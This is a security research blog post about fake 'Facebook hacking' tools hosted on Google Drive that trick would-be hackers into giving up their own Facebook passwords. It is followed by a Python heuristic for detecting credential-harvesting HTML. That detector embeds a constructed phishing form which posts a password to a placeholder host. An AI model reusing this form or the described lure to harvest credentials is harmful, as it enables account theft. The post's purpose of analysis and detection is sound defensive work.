CaaS in the Cloud
Cloud Threat Labs (CTL), now part of Symantec Corporation, discovered that hackers are using Google Drive to host Facebook Phishing and Account hijacking tools.
Fake Facebook Hacking Tools Hosted on Google Drive for Stealing Credentials
Aditya K Sood and Rehan Jalil
Elastica Cloud Threat Labs, a research group of Blue Coat, now part of Symantec Corporation
The Crimeware-as-a-Service (CaaS) model gives cybercriminals a way to automate their unauthorized and often illegal activities on the Internet, and they can earn a significant amount of money very quickly using CaaS. Recently, Cloud Threat Labs (CTL), now part of Symantec Corporation, discovered that hackers are using Google Drive to host Facebook phishing and account hijacking tools. Multiple versions of these tools were found on Google Drive.
Analysis: Generally, online scamming and phishing tools are used broadly to harvest credentials from target entities. In this case study, we will take a look at the “Facebook Hacking” tool, including multiple variants that are used by unauthorized actors to steal end-user credentials for nefarious purposes. In reality, this is not a real hacking tool that exploits vulnerabilities in Facebook; rather, it is an online scamming tool, sold as a service under the CaaS model, that exploits novice individuals attempting to hack another person’s Facebook account.
Note: In this research, we have looked into multiple scamming and phishing tools hosted on Google Drive that enable cybercriminals to target users and convince them, through social engineering, to divulge their Facebook account credentials by offering them the ability to hack into the Facebook accounts of other users. These attacks are a legitimate enterprise concern because many enterprise users also use Facebook (please check for additional toolsets in the Appendices section). The working model can differ between tools, but the end result is either stolen credentials or monetary theft.
There are a number of points to consider before we discuss the case study:
- The attacker abuses the web publishing functionality provided by cloud storage services, in this case Google Drive.
- The attacker can use previously stolen credentials for cloud storage services and use the compromised accounts to host the tool. In addition, the attacker can also use free accounts provided by the cloud storage providers and abuse them for unauthorized activities.
- The associated tool does not exploit any vulnerability in the Facebook OSN, rather it conducts a social engineering attack to fool users into thinking they can hack into other users’ Facebook accounts by providing specific information as requested by the tool. We will discuss the complete flow in a bit.
- The attackers can successfully steal the users’ Facebook account credentials through this social engineering attack.
- The stolen Facebook accounts’ credentials can be later used for multiple attacks such as drive-by download attacks through malicious link sharing, malvertisements, stealing information from the groups, and others.
- The attacker can sell the stolen credentials in the underground cybercrime market for monetary benefit, which is the main purpose of the CaaS model.
Let’s analyze one variant of the tool:
- When the user receives the Google Drive link and opens it, the following web page is displayed.
- The tool presents the following options (verbatim) to the user “Step 1. Login in You Account” and “Step 2. Put You Friend Link and Click Hack Account!.”
- The tool asks the user to first log in to his/her account before the process of hacking another user’s account begins. When they click the “Click Here To Login” button, the tool generates an inline popup and asks for the user’s Facebook account password.
- When the user supplies the account credentials, the information is transmitted to an attacker-controlled domain, which in this case is a subdomain hosted on the “altervista.org” site. This means the user’s Facebook account credentials have been stolen by the attacker on the fly.
- Once the credentials have been supplied, the user is shown the 404 page as shown below and the browser is redirected back to the main page.
- When the user then supplies the target profile’s Facebook URL, the tool does nothing except display a fake “Verifying” indicator that never returns a result. This is a simple technique to trick the user into believing the tool is working to gain access to the targeted profile on Facebook.
We have found multiple variants of these types of tools as highlighted in the Appendix section. We won’t go into analysis of individual tools but the primary purposes of these tools are the same.
The following are some typical countermeasures:
- Gain granular visibility into cloud application traffic as well as network traffic. Blue Coat’s Elastica CloudSOC™ provides complete visibility into cloud application traffic and how users interact with these apps.
- Scan files sitting in Google Drive via APIs and files shared via Google URLs. The Blue Coat advanced malware analysis engine, along with CloudSOC, provides the capability to scan all files in cloud applications and files shared via links.
- Enforce security policy for both cloud and non-cloud apps. ProxySG and advanced malware analysis integration with Elastica CloudSOC provides enterprise users with complete cloud app visibility and data security policy enforcement features, which can eliminate or mitigate the impact of these types of exploits.
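The behaviour described in the analysis above (a Facebook-branded page that prompts for a password and posts it to an unrelated host) is exactly the kind of indicator a file scanner for shared Google Drive content can look for. The following is an added example, not code from Blue Coat, Elastica or Symantec: a small heuristic that parses an HTML file, finds forms containing a password field, and flags any whose submit target is not a domain belonging to the brand the page impersonates. The two HTML samples, the `phish-host.invalid` host name and the `BRAND_DOMAINS` table are constructed for illustration; a production scanner would maintain a larger brand list and combine this with the other checks the page mentions (malware analysis, link scanning).

```python
"""Heuristic detector for credential-harvesting HTML pages.

Flags a page when it (a) contains brand keywords, (b) has a form with a
password input, and (c) that form submits to a host outside the brand's
legitimate domains. Uses only the standard library so it can run offline.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample mirroring the structure described in the analysis:
# Facebook branding, a login prompt, and a form posting to a third-party host.
# The host name is a placeholder (.invalid TLD), not a real attacker domain.
SAMPLE_PHISHING_HTML = """
<html><head><title>Facebook Hacker</title></head>
<body>
<h1>Step 1. Login in You Account</h1>
<form method="post" action="https://phish-host.invalid/collect.php">
  <input type="text" name="email">
  <input type="password" name="pass">
  <input type="submit" value="Click Here To Login">
</form>
</body></html>
"""

# Constructed benign sample: same branding, but the form posts to the brand's own domain.
SAMPLE_BENIGN_HTML = """
<html><head><title>Facebook</title></head>
<body>
<form method="post" action="https://www.facebook.com/login.php">
  <input type="text" name="email">
  <input type="password" name="pass">
</form>
</body></html>
"""

# Brand keyword -> domains that may legitimately receive that brand's credentials (assumed list).
BRAND_DOMAINS = {"facebook": ("facebook.com",)}


class _FormCollector(HTMLParser):
    """Collects every <form> (action + whether it has a password input) and all visible text."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None
        self.text = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "has_password": False}
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form" and self._current is not None:
            self.forms.append(self._current)
            self._current = None

    def handle_data(self, data):
        self.text.append(data)


def _host_matches(host, domains):
    """True if host equals one of the domains or is a subdomain of it."""
    host = host.lower()
    return any(host == d or host.endswith("." + d) for d in domains)


def scan_html(html, page_url=None):
    """Return a list of finding strings; an empty list means no indicator fired.

    page_url (optional) resolves relative form actions, e.g. for files served
    from a cloud storage host rather than the brand's own site.
    """
    parser = _FormCollector()
    parser.feed(html)
    parser.close()
    page_text = " ".join(parser.text).lower()
    brands = [b for b in BRAND_DOMAINS if b in page_text]
    page_host = (urlparse(page_url).hostname or "") if page_url else ""

    findings = []
    for form in parser.forms:
        if not form["has_password"]:
            continue
        action_host = urlparse(form["action"]).hostname or page_host
        for brand in brands:
            if not _host_matches(action_host, BRAND_DOMAINS[brand]):
                findings.append(
                    f"password form posts to '{action_host or '<unknown>'}' "
                    f"while page is branded '{brand}'"
                )
    return findings


if __name__ == "__main__":
    for name, sample in (("phishing", SAMPLE_PHISHING_HTML), ("benign", SAMPLE_BENIGN_HTML)):
        print(name, scan_html(sample) or "clean")
```

The check is deliberately conservative: a login form posting to the brand's own domain is never flagged, and a page without brand keywords produces no finding, so the scanner can be run broadly over shared files without drowning analysts in alerts. Passing the file's download URL as `page_url` matters for relative `action` attributes, since a form on a cloud-hosted file that posts back to the hosting domain is just as suspicious as one posting to a third party.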
Appendix 1: Face Off Facebook Hacker 17.1 and 17.2
Appendix 2: Skull Facebook Hacker 18.1
Appendix 3: Scorpion Facebook Hacker 16.2
Appendix 4: Scorpion Facebook Bot 6.1
Appendix 5: Face Off Facebook Credits Generator 13.1
Appendix 6: Cheat World Facebook Likes Online Generator